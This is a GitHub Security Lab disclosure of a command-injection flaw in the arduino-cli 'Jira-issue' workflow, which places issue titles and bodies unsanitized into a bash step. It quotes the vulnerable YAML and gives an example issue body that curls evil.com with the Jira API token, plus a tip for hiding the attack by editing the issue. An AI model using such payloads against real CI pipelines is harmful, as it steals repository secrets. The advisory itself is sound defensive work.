skip to content
Back to GitHub.com
Home Bounties CodeQL Research Advisories Get Involved Events
February 3, 2021

GHSL-2020-171: Command injection in arduino/arduino-cli workflow

Jaroslav Lobacevski

Coordinated Disclosure Timeline

Summary

The ‘Jira-issue’ GitHub workflow is vulnerable to arbitrary command injection.

Product

Arduino-Cli GitHub repository

Tested Version

Jira-issue.yaml from the Master branch.

Details

Issue: The title and body of a public GitHub issue are used to format a shell command

When a user creates a public issue it automatically starts the Jira-issue.yaml GitHub workflow. The title and body of the issue are used without sanitization to format a bash script that invokes Jira.

      - name: Create issue
        run: |
          jira create \
          --noedit \
          -p ${{ secrets.JIRA_PROJECT_CODE }} \
          -i Task \
          -o summary="${{ github.event.issue.title }}" \
          -o description="${{ github.event.issue.body }}
          ${{ github.event.issue.html_url }}" \
          >> output

Impact

This vulnerability allows for arbitrary command injection into the bash script. For example a user may create an issue with the title It doesn't work on my machine and body `curl http://evil.com?$JIRA_API_TOKEN` which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the issue to Never mind my bad. and close it.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-171 in any communication regarding this issue.